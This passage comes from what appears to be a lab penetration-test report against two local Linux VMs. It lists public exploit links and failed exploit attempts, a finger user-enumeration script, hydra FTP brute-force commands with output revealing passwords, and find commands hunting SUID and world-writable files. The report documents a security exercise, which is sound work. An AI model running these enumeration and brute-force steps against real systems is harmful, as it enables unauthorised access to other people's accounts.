Overflow PoC2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445)2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian

Page 18: Root Password

OpenSSH Remote SELinux Privilege Elevation Exploit (auth)2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071702.txt;Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit2008-07-18;http://www.anyside.org/exp/exploits/remote/2008071801.txt;Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)2008-08-11;http://www.anyside.org/exp/exploits/remote/2008081101.txt;Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090501.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090503.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC

While this list looks impressive in length, removing exploits that don't match the operating system, don't match the software installed, don't match the proper version or don't provide a privilege escalation leaves only 3 exploits. The “....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit”, “....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.” and “2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit” exploits.

ii. Exploits – round 1

The 3 exploits found were downloaded and reviewed. The following lists the exploits in the order they were attempted (from most to least likely to work).

! Snmppd SNMP proxy daemon format string exploit.

Reviewing the source code for this exploit reveals that this exploit appears to match all of the required criteria. The code was successfully compiled after making major modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

! Remote exploit for Apache + OpenSSL v0.9.6d and below.

While the Apache version matches perfectly, the kernel version 2.4.20-8 is more commonly associated with a Red Hat 9.0 installation rather than a Red Hat 8.0 installation. The code was successfully compiled after making minor modifications to the source to provide missing openssl include files. The execution of the exploit was unsuccessful.

! ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root

exploit.

Page 19: Root Password

Reviewing the code for this exploit reveals that the exploit was written in 1998. The possibility of this exploit being successful was deemed to be very slim. The exploit was successfully compiled after making minor modifications to the source to fix syntax issues due to line wrapping/formatting defects. The execution of the exploit was unsuccessful.

iii. Research via secwatch.org

Having exhausted the exploits known to the anyside.org site, the secwatch.org site was used to continue the search. The search results were quite extensive compared to the anyside.org list. However, the only additional exploit located was the “UW imapd IMAP 4.1 server”.

iv. Exploits – round 2

After quite an extensive review of possible exploits, only one additional exploit was located. The “UW imapd IMAP 4.1 server” exploit.

! UW imapd IMAP 4.1 server.

This exploit is meant for the 2001.315 version of the uw-imapd service. The service was fingerprinted as “UW Imapd 2001.315rh”. The rh addition to the version may indicate that Red Hat has applied a patch to resolve the vulnerability. The code was successfully compiled without issues. The execution of the exploit was unsuccessful.

D. User discovery

i. Abuse of finger

The finger service running on port 79/tcp provides us with the ability to brute force user names on the cptvm1 host. To accomplish this, a shell script executing finger over a list of user names was implemented. The list of user names was generated by googling for a list of common user names. The VM running back|track3 did not have a proper finger client installed so this command was executed from the host machine under OSX.

The names of 18 users on the cptvm1 host were discovered. Reviewing the output from the finger command reveals that of the 18 user accounts, only the “root”, “user” and “postgres” users have the ability to login to a standard shell.

$ cat fingerListOfUserNames.sh #!/bin/bashwhile read userName; do finger ${userName}@$1 >> "usersOn$1_RAW.txt"done < $2

Page 20: Root Password

sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.txt" > "usersOn$1_FOUND.txt"awk '/^Login:/ { print $2 }' "usersOn$1_FOUND.txt" | sort -u > "usersOn$1.txt"

$ fingerListOfUserNames.sh 192.168.1.200 usernames.txt

$ ls -alFtotal 96drwxr-xr-x 7 matt matt 238 Feb 11 22:23 ./drwxr-xr-x 11 matt matt 374 Feb 10 19:12 ../-rwxr-xr-x 1 matt matt 291 Feb 11 22:06 fingerListOfUserNames.sh*-rw-r--r-- 1 matt matt 3550 Feb 10 19:31 usernames.txt-rw-r--r-- 1 matt matt 107 Feb 11 22:06 usersOn192.168.1.200.txt-rw-r--r-- 1 matt matt 4699 Feb 11 21:46 usersOn192.168.1.200_FOUND.txt-rw-r--r-- 1 matt matt 26235 Feb 11 21:46 usersOn192.168.1.200_RAW.txt

$ cat usersOn192.168.1.200.txtadmapachedaemonftplpmailnfsnobodynobodynscdoperatorpostgresrootrpcrpcusersshduseruucpvcsa

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

Page 21: Root Password

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

E. Brute force password guessing

i. Discovery of password for “user” account

As various remote exploits have been unsuccessful, a brute force attack against the password of the “user” and “postgres” accounts was attempted. Typically, password guessing of user accounts is stifled with configuration items like: locking user accounts after exceeding a maximum number of login attempts or by providing an exponentially increasing delay length between invalid login attempts. In the case of the ftp service listening on port 21/tcp, neither of these techniques was applied. The hydra utility was selected as it allows a list of user names to be provided, a list of passwords to be provided and the protocol to be used. The user accounts file was populated by taking the user accounts configured to login within a standard shell. The root user was removed from the list as the ftp service did not allow root logins. The passwords list was located by googling for a list of the most common passwords used.

The result of this attack was the discovery of the password, “digital”, for the “user” account. The credentials were validated by sshing into the ctpvm1 host. An unsuccessful attempt to login to the cptvm2 host using the “user” name and password was also attempted.

bt user # cat usernames/cptvm1.users.txt userpostgres

bt user # hydra -e n -L usernames/cptvm1.users.txt -P passwords/passwords.txt 192.168.1.200 ftpHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-27 22:57:29[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task[DATA] attacking service ftp on port 21

Page 22: Root Password

[STATUS] 402.00 tries/min, 402 tries in 00:01h, 139356 todo in 05:47h[STATUS] 402.00 tries/min, 1206 tries in 00:03h, 138552 todo in 05:45h[STATUS] 404.71 tries/min, 2833 tries in 00:07h, 136925 todo in 05:39h[STATUS] 405.60 tries/min, 6084 tries in 00:15h, 133674 todo in 05:30h[STATUS] 406.06 tries/min, 12588 tries in 00:31h, 127170 todo in 05:14h[STATUS] 406.21 tries/min, 19092 tries in 00:47h, 120666 todo in 04:58h[STATUS] 406.27 tries/min, 25595 tries in 01:03h, 114163 todo in 04:42h[21][ftp] host: 192.168.1.200 login: user password: digital[STATUS] 406.33 tries/min, 32100 tries in 01:19h, 107658 todo in 04:25h[STATUS] 406.34 tries/min, 38602 tries in 01:35h, 101156 todo in 04:09h[STATUS] 406.36 tries/min, 45106 tries in 01:51h, 94652 todo in 03:53h[STATUS] 406.40 tries/min, 51613 tries in 02:07h, 88145 todo in 03:37h[STATUS] 406.43 tries/min, 58119 tries in 02:23h, 81639 todo in 03:21h[STATUS] 406.46 tries/min, 64627 tries in 02:39h, 75131 todo in 03:05h[STATUS] 406.47 tries/min, 71133 tries in 02:55h, 68625 todo in 02:49h[STATUS] 406.49 tries/min, 77639 tries in 03:11h, 62119 todo in 02:33h[STATUS] 406.50 tries/min, 84145 tries in 03:27h, 55613 todo in 02:17h[STATUS] 406.53 tries/min, 90656 tries in 03:43h, 49102 todo in 02:01h[STATUS] 406.53 tries/min, 97160 tries in 03:59h, 42598 todo in 01:45h[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)Hydra (http://www.thc.org) finished at 2009-01-28 03:05:41

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd, operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsaUsername/password: user/digital

cptvm2 (192.168.1.104)

Page 23: Root Password

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

ii. Discovery of password for “cptvm1” and “cptvm2” accounts

Upon the successful login to the cptvm1 host, the /etc/passwd file was reviewed. This action provided all of the names for the user accounts on the cptvm1 host. Two accounts of high interest, “cptvm1” and “cptvm2”, were identified. While researching the configuration of the cptvm1 host, a brute force password guessing attack was launched against the “cptvm1” and “cptvm2” users.

The initial attack had an incorrect switch in the command line (-f). This switch instructs hydra to stop executing as soon as a valid user name/password pair is found. As a result of the incorrect switch, a second attack to discover the “cptvm2” account password had to be completed. The end result of the attacks were the discovery of the “cptvm1” and “cptvm2” passwords (cptvm1/windows, cptvm2/linux). The credentials were validated by sshing into the cptvm1 host via using both accounts. Successful ssh connections were also established to the cptvm2 host using the accounts. The /etc/passwd file on the cptvm2 host was reviewed for accounts of interest.

bt ~ # cat usernames/cptvm1.users2.txtcptvm1cptvm2

bt ~ # hydra -e n -f -L usernames/cptvm1.users2.txt -P passwords/passwords.txt 192.168.1.200 ftpHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-28 18:26:44[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task[DATA] attacking service ftp on port 21[STATUS] 416.00 tries/min, 416 tries in 00:01h, 139342 todo in 05:35h[STATUS] 405.33 tries/min, 1216 tries in 00:03h, 138542 todo in 05:42h[STATUS] 406.86 tries/min, 2848 tries in 00:07h, 136910 todo in 05:37h[STATUS] 406.40 tries/min, 6096 tries in 00:15h, 133662 todo in 05:29hThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

bt ~ # hydra -RHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-28 20:38:12[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task[DATA] attacking service ftp on port 21[STATUS] 8410.00 tries/min, 8410 tries in 00:01h, 131348 todo in 00:16h[STATUS] 3072.00 tries/min, 9216 tries in 00:03h, 130542 todo in 00:43h[STATUS] 1549.71 tries/min, 10848 tries in 00:07h, 128910 todo in 01:24h[STATUS] 151.78 tries/min, 12987 tries in 01:25h, 126771 todo in 13:56hThe session file ./hydra.restore was written. Type "hydra -R" to resume

Page 24: Root Password

session.

bt ~ # hydra -RHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task[DATA] attacking service ftp on port 21The session file ./hydra.restore was written. Type "hydra -R" to resume session.

bt ~ # hydra -RHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task[DATA] attacking service ftp on port 21[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h[21][ftp] host: 192.168.1.200 login: cptvm1 password: windows[STATUS] attack finished for 192.168.1.200 (valid pair found)Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25

bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftpHydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per task[DATA] attacking service ftp on port 21[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h[21][ftp] host: 192.168.1.200 login: cptvm2 password: linux[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd

Page 25: Root Password

79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntpoperator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshdsync, user, uucp, vcsa, webalizer, xfsUsername/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfsUsername/password: cptvm1/windows, cptvm2/linux

F. Research of cptvm1 and cptvm2 hosts

i. cptvm1

Various data was gathered pertaining to the permissions of files within the system. Items of interest were files having permissions set to run as root, files having permissions incorrectly set to allow anyone to read/write/execute them and files owned by one of the accounts with a known password.

The location of all files owned by the “cptvm1”, “cptvm2” and “user” accounts (accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.

Page 26: Root Password

[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2-ouseruser_200.txt

The locations of all files having read and execute permissions set for “other” were gathered. This may provide the ability to read data or execute tasks we normally should not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt

The locations of all files that are owned by a group we have access to and are readable or executable were gathered. This may provide the ability to read data or execute tasks we normally should not have privileges to.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2-ogroupuser_200.txt

The locations of all files that are set to execute as the root user were gathered. This will provide a list of executables that should be researched for exploits.

[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt

The information gathered during this phase was used mainly for exploit research.

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s

Page 27: Root Password

6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm, gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntpoperator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshdsync, user, uucp, vcsa, webalizer, xfsFiles that execute as root: /usr/bin/sudo, /usr/sbin/suexec, /sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart, /usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd, /sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh, /usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper, /bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage, /usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute, /usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctlUsername/password: user/digital, cptvm1/windows, cptvm2/linux

cptvm2 (192.168.1.104)

Operating system: LinuxKernel version: Linux 2.6.9 - 2.6.23TCP ports: 22, 111, 939TCP services:

22/tcp ssh OpenSSH 4.3 (protocol 2.0)111/tcp rpcbind 2 (rpc #100000)939/tcp status 1 (rpc #100024)

User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus, distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfsUsername/password: cptvm1/windows, cptvm2/linux

ii. cptmv2

Various data was gathered pertaining to the kernel version and permissions of files within the system. Items of interest were files having permissions set to run as root, files having permissions incorrectly set to allow anyone to read/write/execute them and files owned by one of the accounts with a known password.

Up to this point, the specific version of the Linux kernel was not known. To gather this information, the uname commands was used.

[cptvm1@localhost ~ ]$ uname -aLinux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux

The locations of all files owned by the “cptvm1” and “cptvm2” accounts

Page 28: Root Password

(accounts we have passwords for) were gathered. This may provide the ability to access data or executables we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104.txt

The locations of all files having read and execute permissions set for “other” were gathered. This may provide the ability to read data or execute tasks we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt

The locations of all files that are owned by a group we have access to and are readable or executable were gathered. This may provide the ability to read data or execute tasks we normally should not have privileges to.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt

The locations of all files that are set to execute as the root user were gathered. This will provide a list of executables that should be researched for exploits.

[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt

The information gathered during this phase was used mainly for exploit research. However, several files of interest were discovered. Namely, the CISngtool (Center for Internet Security, Next Generation scoring tool - http://www.cisecurity.org).

From the information gathered during this step, the systems of interest are configured as follows:

cptvm1 (192.168.1.200)

Operating system: LinuxKernel version: 2.4.20-8TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770TCP services:

7/tcp echo21/tcp ftp vsftpd 1.1.322/tcp ssh OpenSSH 3.5p1 (protocol 1.99)23/tcp telnet Linux telnetd79/tcp finger Linux fingerd80/tcp http Apache httpd 2.0.40 (Red Hat Linux)109/tcp POSSIBLY pop2110/tcp pop3 ipopd 2001.78rh

Page 29: Root Password

111/tcp rpcbind 2 (rpc #100000)143/tcp imap UW Imapd 2001.315rh199/tcp smux Linux SNMP multiplexer443/tcp ssl/http Apache httpd 2.0.40 (Red Hat Linux)686/tcp rquotad 1-2 (rpc #100011)993/tcp imaps995/tcp pop3s6000/tcp X1132768/tcp status 1 (rpc #100024)32770/tcp mountd 1-3 (rpc #100005)

UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683UDP services:

7/udp echo13/udp daytime37/udp time (32 bits)111/udp rpcbind 2 (rpc #100000)123/udp ntp161/udp snmp SNMPv1 server (public)162/udp snmptrap631/udp unknown683/udp rquotad 1-2 (rpc #100011)

